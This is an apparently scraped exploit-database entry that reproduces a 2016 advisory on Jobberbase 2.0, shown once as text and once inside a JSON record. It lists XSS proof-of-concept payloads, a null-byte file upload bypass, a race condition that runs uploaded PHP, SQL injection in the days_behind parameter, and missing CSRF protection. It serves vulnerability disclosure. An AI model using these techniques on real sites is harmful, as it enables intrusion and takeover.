Search...

Jobberbase 2.0 - Multiple Vulnerabilities

2016-09-08T00:00:00

ID EXPLOITPACK:1DDE902BE0DC50C4E5C67AC965413325
Type exploitpack
Reporter Ross Marks
Modified 2016-09-08T00:00:00

Description

Jobberbase 2.0 - Multiple Vulnerabilities

                                        
                                            Jobberbase:			http://www.jobberbase.com/
Version:			2.0
By Ross Marks: 		http://www.rossmarks.co.uk

1) Local path disclosure - change any variable to an array and in most cases it will tell you the local path where the application is installed
	eg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js
	returns: Array to string conversion in &lt;b&gt;/var/www/jobberbase/_lib/class.Job.php&lt;/b&gt;

2) Open redirect - when submitting an application can change "Referer:" header to anything and will redirect there

3) reflect XSS in username - http://example.com/admin/
		eg. "&gt;&lt;script&gt;alert(1)&lt;/script&gt;
	reflect XSS in search: http://example.com/search/|&lt;img src="x" onError="alert(1)"&gt;/

4) persistant XSS on admin backend homepage
		create a job and give the URL:
		" onhover="alert(1)
	persistant XSS - admin add to category name (no protection)

5) unrestricted file upload
	upload CV accepts any filetype appends _ uniqueid() to filename
	eg. "file.php" becomes "file_&lt;uniqueid&gt;.php"
	uniquid in in insecure method for generating random sequences and is based on microtime
	if the server is using an older version of PHP a null byte can be used 
	ie. "test.php%00.php" would be uploaded as "test.php"

6) code execution race condition:
	if the admin has chosen to not store uploaded CV's 
	they are first moved from /tmp to the writable /upload directory before being unlinked
	this gives a brief window of opportunity for an attacker to run http://example.com/uploads/file.php before it is deleted

7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js
	days_behind parameter is vulnerable

** notes **

admin change password page don't need old password, no csrf token just a simple POST request.
admin password stored in md5 format unsalted
cookies do NOT have "secure" or "HTTPonly" flags enabled
no csrf anywhere

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:22", "references": [], "description": "\nJobberbase 2.0 - Multiple Vulnerabilities", "edition": 1, "reporter": "Ross Marks", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2016-09-08T00:00:00", "title": "Jobberbase 2.0 - Multiple Vulnerabilities", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:22", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-01T19:04:22", "rev": 2}, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-09-08T00:00:00", "id": "EXPLOITPACK:1DDE902BE0DC50C4E5C67AC965413325", "href": "", "viewCount": 1, "sourceData": "Jobberbase:\t\t\thttp://www.jobberbase.com/\nVersion:\t\t\t2.0\nBy Ross Marks: \t\thttp://www.rossmarks.co.uk\n\n1) Local path disclosure - change any variable to an array and in most cases it will tell you the local path where the application is installed\n\teg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js\n\treturns: Array to string conversion in <b>/var/www/jobberbase/_lib/class.Job.php</b>\n\n2) Open redirect - when submitting an application can change \"Referer:\" header to anything and will redirect there\n\n3) reflect XSS in username - http://example.com/admin/\n\t\teg. \"><script>alert(1)</script>\n\treflect XSS in search: http://example.com/search/|<img src=\"x\" onError=\"alert(1)\">/\n\n4) persistant XSS on admin backend homepage\n\t\tcreate a job and give the URL:\n\t\t\" onhover=\"alert(1)\n\tpersistant XSS - admin add to category name (no protection)\n\n5) unrestricted file upload\n\tupload CV accepts any filetype appends _ uniqueid() to filename\n\teg. \"file.php\" becomes \"file_<uniqueid>.php\"\n\tuniquid in in insecure method for generating random sequences and is based on microtime\n\tif the server is using an older version of PHP a null byte can be used \n\tie. \"test.php%00.php\" would be uploaded as \"test.php\"\n\n6) code execution race condition:\n\tif the admin has chosen to not store uploaded CV's \n\tthey are first moved from /tmp to the writable /upload directory before being unlinked\n\tthis gives a brief window of opportunity for an attacker to run http://example.com/uploads/file.php before it is deleted\n\n7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js\n\tdays_behind parameter is vulnerable\n\n** notes **\n\nadmin change password page don't need old password, no csrf token just a simple POST request.\nadmin password stored in md5 format unsalted\ncookies do NOT have \"secure\" or \"HTTPonly\" flags enabled\nno csrf anywhere", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}